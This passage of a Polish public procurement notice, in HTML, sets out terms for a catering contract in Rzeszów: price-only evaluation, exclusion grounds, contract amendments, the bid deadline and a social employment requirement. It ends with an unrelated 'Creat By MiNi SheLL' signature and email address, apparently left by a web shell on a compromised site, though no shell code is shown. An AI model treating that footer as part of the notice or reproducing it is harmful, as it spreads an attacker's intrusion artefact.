uzyskanych punktów będzie zaokrąglana do dwóch miejsc po przecinku. Ocenie będą podlegały oferty niepodlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, każdy wykonawca składający ofertę, zobowiązany jest złożyć wraz z ofertą stosowne oświadczenie, stanowiące załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie określa warunków udziału w postępowaniu.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia.<br/>3)	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie dotyczącym:<br/>1) przedmiotu zamówienia – liczby sztuk cateringu w przypadku:<br/>b)	zmiany liczby osób uczestniczących w wydarzeniach organizowanych przez Zamawiającego (np. zwiększenia lub zmniejszenia liczebności jednej grupy szkoleniowej do 30 osób), z zastrzeżeniem § 5 ust. 8. Zamawiający zastrzega, iż minimalna liczba osób, dla których zrealizowana zostanie usługa cateringowa objęta niniejszym zamówieniem to 300 (300 sztuk cateringu) – maksymalnie 1200 (1200 sztuk cateringu).<br/>2)	wynagrodzenia - w przypadku: <br/>a) wystąpienia którejkolwiek ze zmian przepisów wskazanych w art. 436 pkt 4 lit. b) ustawy Pzp tj. zmiany: <br/>1)	stawki podatku od towarów i usług oraz podatku akcyzowego, <br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, <br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę. <br/>b)	zmiany w zakresie przedmiotu umowy, o której mowa w pkt 1) powyżej - proporcjonalnie do wymiaru zmniejszenia zakresu przedmiotu umowy.<br/>2.	Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian o których mowa w ust. 1 pkt 2) lit a). <br/>3.	W przypadku zmiany, o której mowa w ust.1 pkt 2) lit a) ppkt 1) wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów. <br/>4.	W przypadku zmiany, o której mowa w ust.1 pkt 2) lit a) ppkt 2) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia. <br/>5.	W przypadku zmiany, o którym mowa w ust.1 pkt 2) lit a) ppkt 3) i ppkt 4) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego. <br/>6.	Za wyjątkiem sytuacji o której mowa w ust. 1 pkt 2) lit a) ppkt 1) wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego złożenia przez Wykonawcę oświadczenia o wysokości dodatkowych koszów wynikających z wprowadzenia zmian, o których mowa w ust. 1 pkt 2) lit a) ppkt 2) -4). <br/>7.	Warunkiem dokonania zmian umowy jest złożenie uzasadnionego wniosku przez stronę inicjującą zmianę i jego akceptacja przez drugą stronę lub sporządzenie przez strony stosownego protokołu. <br/>8.	Zmiany treści umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">W celu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania informatycznego pod adresem https://platformazakupowa.pl/transakcja/909905. W celu złożenia oferty należy przejść do transakcji (zakładki) dedykowanej dla niniejszego postępowania z sygnaturą sprawy: DA.2611.13.2024 i daną nazwą postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-26 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający określa dodatkowe wymagania związane z zatrudnianiem osób, o których mowa w art. 96 ust. 2 pkt 2 Pzp. <br/>Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, a następnie zostanie z nim podpisana umowa, zobowiązany będzie do zatrudnienia przy realizacji przedmiotu zamówienia, co najmniej 1 osoby wymienionej w katalogu zawartym w art. 96 ust. 2 pkt. 2) ustawy Prawo Zamówień Publicznych, tj. w szczególności:<br/>1)	bezrobotnych w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy, <br/>2)	osób poszukujących pracy, niepozostających w zatrudnieniu lub niewykonujących innej pracy zarobkowej, w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy, <br/>3)	osób usamodzielnianych, o których mowa w art. 140 ust. 1 i 2 ustawy z dnia 9 czerwca 2011 r. o wspieraniu rodziny i systemie pieczy zastępczej, <br/>4)	młodocianych, o których mowa w przepisach prawa pracy, w celu przygotowania zawodowego, <br/>5)	osób niepełnosprawnych w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, <br/>6)	innych osób niż określone w lit. a–e, o których mowa w ustawie z dnia 13 czerwca 2003 r. o zatrudnieniu socjalnym (Dz. U. z 2020 r. poz. 176) lub we właściwych przepisach państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego,<br/>7)	osób do 30. roku życia oraz po ukończeniu 50. roku życia, posiadających status osoby poszukującej pracy, bez zatrudnienia.<br/><br/>Wykonawca na czas realizacji przedmiotu zamówienia (36 miesięcy), zatrudni na co najmniej ¼ wymiaru etatu na podstawie umowy o pracę lub zatrudni na podstawie umowy cywilno-prawnej, co najmniej 1 osobę wymienioną w katalogu z art. 96 ust. 2 pkt. 2) ustawy Pzp.<br/><br/>Przed podpisaniem umowy, Wykonawca złoży stosowne oświadczenie, dotyczące obowiązku zatrudnianie osoby wskazanej powyżej. <br/><br/><br/>UWAGA! W ramach dokonania wyceny, każdy Wykonawca zobligowany jest wyszczególnić cenę za 1 sztukę cateringu oraz cenę za maksymalną liczbę sztuk cateringu objętego zamówieniem tj. 1200 sztuk, wedle poniższego.<br/><br/>Cena brutto w PLN za 1 sztukę cateringu …………………... zł brutto …………………… zł netto<br/>Cena brutto w PLN za 1200 sztuk cateringu …………………... zł brutto	……………………. zł netto<br/><br/>W procesie oceny i badania ofert, ocenie podlegać będzie cena za pełną realizację zamówienia (tj. 1200 sztuk cateringu). Rozbicie cenowe wymagane jest do rozliczenia finansowego, bowiem Zamawiający zapłaci za faktyczną liczbę sztuk cateringu przygotowanych i dostarczonych do Zamawiającego. <br/><br/>Podpisanie umowy nastąpi w miejscu i terminie wskazanym przez Zamawiającego. Umowa będzie podpisywana w siedzibie zamawiającego (35-959 Rzeszów, ul. Szopena 51) po wcześniejszym ustaleniu dokładnego terminu. Dotyczy to też wykonawców, którzy mają siedzibę poza Rzeszowem. Zamawiający wyznaczy dwa proponowane terminy na podpisanie umowy. W przypadku, gdy Wykonawca nie stawi się w żadnym z zaproponowanych terminów, wówczas Zamawiający uzna, że uchyla się on od podpisania umowy i przystąpi do ponownego wyboru najkorzystniejszej oferty. Zamawiający dopuszcza możliwość elektronicznego podpisu umowy. <br/><br/>Przed podpisaniem umowy Wykonawca, którego oferta uznana zostanie za najkorzystniejszą, zobowiązany będzie złożyć oświadczenie, w którym potwierdzi, że zatrudni na czas realizacji przedmiotu zamówienia (36 miesięcy), co najmniej 1 osobę w wymiarze co najmniej ¼ etatu, która spełni przynajmniej jedno z kryteriów wskazanych w katalogu zawartym w art. 96 ust. 2 pkt. 2 ustawy Pzp, zgodnie z zapisami wskazanymi Rozdziale II pkt 9 SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com